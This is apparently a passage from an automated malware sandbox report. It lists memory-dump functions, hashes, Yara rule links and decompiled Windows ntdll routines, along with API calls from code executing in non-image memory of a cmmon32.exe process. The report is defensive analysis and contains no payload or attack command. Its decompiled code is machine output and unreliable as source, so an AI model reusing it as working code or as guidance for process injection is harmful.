Opcode Fuzzy Hash: 2448ce55299a36781cfef282d46b842fee36c358c32900020834a09784c538ef
Instruction Fuzzy Hash: A790027120100402D200699A540964A010997F0741FD5D111E5014655EC6A5889171B1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B97AA

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f312d13beabb448467dce037244ec026683b8e0869ccdcc3fb51ff95d34652a9
Instruction ID: 5fd60a87d45dea3188d114d3d4b9d3822dd90ed98536e54bc481d0abfaf82bd1
Opcode Fuzzy Hash: f312d13beabb448467dce037244ec026683b8e0869ccdcc3fb51ff95d34652a9
Instruction Fuzzy Hash: 4290026130100003D240755A541960A4109E7F1741FD5D111E0404654CD955885662A2

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B978A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d726813c3b33f6aac0467ccb04d105642d8ee01780953510a45ddfedf1e22dc
Instruction ID: 6db47bc94ab7050c325f21452f9fbb04b01f5d10e368e65902b83a4f8d2afd1b
Opcode Fuzzy Hash: 8d726813c3b33f6aac0467ccb04d105642d8ee01780953510a45ddfedf1e22dc
Instruction Fuzzy Hash: A490026921300002D280755A540960E010997E1642FD5D515E0005658CC955886963A1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B986A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c49a1e4fd79172604a9a7d628789685a8620cc940e8250555355bab01375a5e
Instruction ID: bbff33f9aab2f0726fd0a77bc38151b350f271ab707f282444536bfe851236dd
Opcode Fuzzy Hash: 0c49a1e4fd79172604a9a7d628789685a8620cc940e8250555355bab01375a5e
Instruction Fuzzy Hash: 0190027120100413D211655A450570B010D97E0681FD5C512E0414658D96968952B1A1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B984A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6c36fb92af536d408ffb134f32244b831aaf882cdad9ca1d98df3f5fcc9b3130
Instruction ID: 5a1a4c8bae397cfbf675a1761655f409b543ddea00835b118ff46a045fac1ee9
Opcode Fuzzy Hash: 6c36fb92af536d408ffb134f32244b831aaf882cdad9ca1d98df3f5fcc9b3130
Instruction Fuzzy Hash: 35900261242041525645B55A440550B410AA7F06817D5C112E1404A50C85669856E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B98FA

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65adda2f67797fbd8a3560b21b038cce7a4e640cd7b8dcc81c9b9787a16a4092
Instruction ID: f575655f23f8d6328b8cb85a0228d92d78060eb4e89d5399d663b869bb8d3410
Opcode Fuzzy Hash: 65adda2f67797fbd8a3560b21b038cce7a4e640cd7b8dcc81c9b9787a16a4092
Instruction Fuzzy Hash: 4090026160100502D201755A440561A010E97E0681FD5C122E1014655ECA658992B1B1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B954A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ecdd9e4248a52c82d3abff5ad84f00fca46ae2eb13643a18e149d8ad4ad33f8
Instruction ID: 099cd3e4a401dc711418e9a6bd7f23d0c0bb59cbb174a78406366dfd18b6e10e
Opcode Fuzzy Hash: 9ecdd9e4248a52c82d3abff5ad84f00fca46ae2eb13643a18e149d8ad4ad33f8
Instruction Fuzzy Hash: D4900265211000030205A95A070550B014A97E57913D5C121F1005650CD661886161A1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B991A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 971986c3044bcef7da6508ae15f9f2bb027cd9796163d44d94ab42276908d67f
Instruction ID: a62995e57df5b02fe7d4260a1806da0ee7217b5e06ff33c2f181fa3bbd884bae
Opcode Fuzzy Hash: 971986c3044bcef7da6508ae15f9f2bb027cd9796163d44d94ab42276908d67f
Instruction Fuzzy Hash: D69002B120100402D240755A440574A010997E0741FD5C111E5054654E86998DD576E5

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B99AA

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad58bc748530313bce4d396bdf609a21b95d1ae053d020d0b463f460b7ece4cc
Instruction ID: 5a36427cc490d7956023592ad2d247c2e1c7ab047065c8788a54e4c23b9c2566
Opcode Fuzzy Hash: ad58bc748530313bce4d396bdf609a21b95d1ae053d020d0b463f460b7ece4cc
Instruction Fuzzy Hash: 0E9002A134100442D200655A4415B0A0109D7F1741FD5C115E1054654D8659CC5271A6

Uniqueness

Uniqueness Score: -1.00%

Function 00572008, Relevance: 1.7, APIs: 1, Instructions: 160threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(B7BB3B7A), ref: 00572148

Memory Dump Source

Source File: 00000008.00000002.613156896.0000000000572000.00000040.00000001.sdmp, Offset: 00572000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a1f7984c00d176f3aa74768c3addda8144fb03d743881adb069f456af5c9fc51
Instruction ID: 5fbfd32b1468895032f62ae90c3d4ef020a6cbf86c307438acdcd0eeab249709
Opcode Fuzzy Hash: a1f7984c00d176f3aa74768c3addda8144fb03d743881adb069f456af5c9fc51
Instruction Fuzzy Hash: 91412935604306CFDB348E26D9987D93BA27F92321F58D65ACD8D4B1A6D338C8C6D602

Uniqueness

Uniqueness Score: -1.00%

Function 00572073, Relevance: 1.6, APIs: 1, Instructions: 108threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(B7BB3B7A), ref: 00572148

Memory Dump Source

Source File: 00000008.00000002.613156896.0000000000572000.00000040.00000001.sdmp, Offset: 00572000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: ae1fe354b4f9d3a710042bb48be7670f9baf1ec5a0a4f32ab5b0f8290f944e64
Instruction ID: 04ba8e0377a917327ea4b357c0ac0f3702832ff203af6d4440ddbb5d53882f81
Opcode Fuzzy Hash: ae1fe354b4f9d3a710042bb48be7670f9baf1ec5a0a4f32ab5b0f8290f944e64
Instruction Fuzzy Hash: FD312535604606DFDB208A26E9887A93BA3BF91731F58D759C8AD1B0E1C774D8C5EB02

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1E6A6A60, Relevance: .2, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E1E6A6A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0x1e76d360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E1E6B9810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0x1e766908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E1E6BCF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E1E6BCF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E1E6BD340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E1E6BB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E1E6BAA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E1E6BD000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E1E6BAA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}

0x1e6a6a6f
0x1e6a6a72
0x1e6a6a78
0x1e6a6a7c
0x1e6a6a7f
0x1e6a6a87
0x1e6e8049
0x1e6e8049
0x1e6e804e
0x1e6e804f
0x1e6e8057
0x1e6e805c
0x00000000
0x1e6a6a8d
0x1e6a6a92
0x1e6a6a92
0x1e6a6a94
0x1e6a6a99
0x1e6a6a9c
0x1e6a6a9f
0x1e6a6aa2
0x1e6a6aaa
0x1e6a6ab0
0x1e6e7eae
0x1e6e7eb4
0x1e6e7eb9
0x00000000
0x00000000
0x00000000
0x00000000
0x1e6e7ebf
0x1e6e7ebf
0x1e6e7ebf
0x1e6e7ec1
0x1e6e7ec6
0x00000000
0x00000000
0x1e6e7ece
0x1e6e7edb
0x1e6e7ee5
0x1e6e7ee7
0x1e6e7ee7
0x1e6e7edd
0x1e6e7edd
0x1e6e7edd
0x1e6e7eea
0x1e6e7ed0
0x1e6e7ed0
0x1e6e7ed3
0x1e6e7ed3
0x1e6e7eec
0x1e6e7ef8
0x1e6e7f00
0x1e6e7f07
0x1e6e7f0a
0x1e6e7f19
0x1e6e7f1b
0x1e6e7f23
0x1e6e7f25
0x1e6e7f28
0x1e6e7f2e
0x1e6e7f31
0x1e6e7f34
0x1e6e7f37
0x1e6e7f3c
0x00000000
0x1e6e7f3e
0x1e6e7f3e
0x1e6e7f41
0x1e6a6b35
0x1e6a6b38
0x1e6a6b44
0x1e6a6b4c
0x1e6a6b4e
0x1e6a6b51
0x1e6a6b69
0x1e6a6b69
0x1e6e7f3c
0x1e6e8046
0x00000000
0x1e6e8046
0x1e6a6abc
0x1e6a6aca
0x1e6e7f49
0x1e6a6b13
0x1e6a6b13
0x1e6a6b16
0x1e6a6b1e
0x1e6e7fe7
0x1e6e7fea
0x1e6e7fed
0x1e6e7ff0
0x1e6e7ff2
0x1e6e7ff4
0x1e6e7ffa
0x00000000
0x00000000
0x1e6e8000
0x1e6e8003
0x1e6e8006
0x1e6e8009
0x1e6e800b
0x1e6e800d
0x1e6e8010
0x1e6e801f
0x00000000
0x00000000
0x1e6e8025
0x1e6a6b2f
0x1e6a6b2f
0x1e6a6b32
0x00000000
0x1e6a6b32
0x1e6a6b26
0x1e6e8030
0x1e6e803a
0x1e6e803c
0x1e6e803c
0x1e6e8032
0x1e6e8032
0x1e6e8032
0x1e6e803f
0x1e6a6b2c
0x1e6a6b2c
0x1e6a6b2c
0x00000000
0x1e6a6b26
0x1e6a6ad0
0x1e6a6ad6
0x1e6a6ade
0x1e6a6ae0
0x1e6a6ae0
0x1e6a6ae5
0x1e6e7f53
0x1e6a6aeb
0x1e6a6aeb
0x1e6a6aeb
0x1e6a6af3
0x1e6e7f5e
0x1e6e7f61
0x1e6e7f68
0x1e6e7f69
0x1e6e7f6b
0x1e6e7f70
0x1e6e7f71
0x1e6e7f76
0x1e6e7f77
0x1e6e7f7c
0x1e6e7f86
0x1e6e7f88
0x1e6e7f8d
0x1e6e7f92
0x1e6e7f97
0x1e6e7f98
0x1e6e7f99
0x1e6e7f9a
0x1e6e7f9f
0x1e6e7fa0
0x1e6e7fa5
0x1e6e7faa
0x1e6e7faa
0x1e6e7faf
0x1e6e7fdc
0x1e6e7fdf
0x00000000
0x1e6e7fb1
0x1e6e7fb1
0x1e6e7fb3
0x1e6e7fb8
0x1e6e7fd4
0x1e6e7fd4
0x00000000
0x1e6e7fd4
0x1e6e7fba
0x1e6e7fbc
0x1e6e7fc2
0x1e6e7fc4
0x1e6e7fc4
0x1e6e7fc7
0x1e6e7fcb
0x1e6e7fcc
0x1e6e7fd1
0x00000000
0x1e6e7fd1
0x1e6a6b04
0x1e6a6b04
0x1e6a6b0b
0x00000000
0x00000000
0x1e6a6b11
0x00000000
0x1e6a6b11
0x1e6a6af3

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e344ad89a6682bcd6ea9fc9ccf0d6364af82d66281dff2ce5c5f4d852d5e34
Instruction ID: 39561ada750606faa2d6a1f17b5b0f746d841d0e2cb7f6798653b67cdee7eb72
Opcode Fuzzy Hash: 47e344ad89a6682bcd6ea9fc9ccf0d6364af82d66281dff2ce5c5f4d852d5e34
Instruction Fuzzy Hash: B981BF75E012599FDB14CF95C891BEEBBF6EF49300F548269E944AB381D335AC01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6A645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E1E6A645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e76d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E6BFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E692280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E68FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e76b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E6BB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x1e6a645b
0x1e6a6463
0x1e6a646d
0x1e6a6475
0x1e6a647a
0x1e6a647e
0x1e6a6480
0x1e6a648c
0x1e6a6490
0x1e6a6495
0x1e6a6498
0x1e6a649b
0x1e6a649f
0x1e6a64a1
0x1e6e7c07
0x1e6e7c09
0x1e6e7c0c
0x00000000
0x1e6a64a7
0x1e6a64a7
0x1e6a64aa
0x1e6e7bf7
0x1e6e7c00
0x00000000
0x1e6e7bf9
0x1e6e7bf9
0x1e6e7bf9
0x1e6a64b0
0x1e6a64b0
0x1e6a64b2
0x1e6a64b2
0x1e6a64b3
0x1e6a64ba
0x1e6a6553
0x1e6a655e
0x1e6a6566
0x1e6a656c
0x1e6a6575
0x1e6a657f
0x1e6a6585
0x1e6a6588
0x1e6a6588
0x1e6a64c7
0x1e6a64cb
0x1e6a64ce
0x1e6a64d3
0x1e6a64da
0x1e6a64e5
0x1e6a64ed
0x1e6a64f1
0x1e6a64f5
0x1e6a64f6
0x1e6a64fa
0x1e6a6502
0x1e6a6503
0x1e6a6504
0x1e6a6507
0x1e6a651a
0x1e6a6524
0x1e6a6524
0x1e6a6526
0x1e6a6526
0x1e6a64aa
0x1e6a652c
0x1e6a652d
0x1e6a652e
0x1e6a6539

APIs

RtlDebugPrintTimes.NTDLL ref: 1E6A651A

Strings

0, xrefs: 1E6A64E5
0, xrefs: 1E6A64FA

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: f015ff4efbefc5bcc9d9812889eaa43668772cd69bc76afc7dbd8540e01eb4d7
Instruction ID: 047ea286935f14099c4043e0194216835578a9019db9b5e47c536d3e8c9dab71
Opcode Fuzzy Hash: f015ff4efbefc5bcc9d9812889eaa43668772cd69bc76afc7dbd8540e01eb4d7
Instruction Fuzzy Hash: 87414AB1A057469FC300CF29C484A1ABBE5FB89714F448A6EF589DB341D731EE49CB86

Uniqueness

Uniqueness Score: -1.00%

Function 1E70FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1E70FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E6BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E705720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E705720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x1e70fdda
0x1e70fde2
0x1e70fde5
0x1e70fdec
0x1e70fdfa
0x1e70fdff
0x1e70fe0a
0x1e70fe0f
0x1e70fe17
0x1e70fe1e
0x1e70fe19
0x1e70fe19
0x1e70fe19
0x1e70fe20
0x1e70fe21
0x1e70fe22
0x1e70fe25
0x1e70fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E70FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E70FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E70FE01

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 5bad06a298799d070151e73adec031d8a74f2cdc811a7d96a08c857df3c355f4
Instruction ID: d5647e969f39c778d39e589610afb79f0b068ccb9bb5bda2bdc3e3d27b01e812
Opcode Fuzzy Hash: 5bad06a298799d070151e73adec031d8a74f2cdc811a7d96a08c857df3c355f4
Instruction Fuzzy Hash: B4F02476600541BFEB250E45DC06F63BFAAEB45B30F240314F628562E1EA62F87097F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmmon32.exe PID: 5516 Parent PID: 3472 cmmon32.exeCOMMON

Executed Functions

Function 02EFA34A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02EF4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02EF4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02EFA39D

Strings

.z`, xrefs: 02EFA38D, 02EFA398

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: fb35e93d4ccc39a55894fedd49a3d5af3c7413f6204c58092117fb37c38049b4
Instruction ID: 5bfb20c9f6f526ba3a673829325ab308643dc641235ce7f38a9d7b2e81eeff9a
Opcode Fuzzy Hash: fb35e93d4ccc39a55894fedd49a3d5af3c7413f6204c58092117fb37c38049b4
Instruction Fuzzy Hash: 9201F6B2245108AFCB18CF88CC84DEB37AEAF8C304F158248FA5CDB240C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

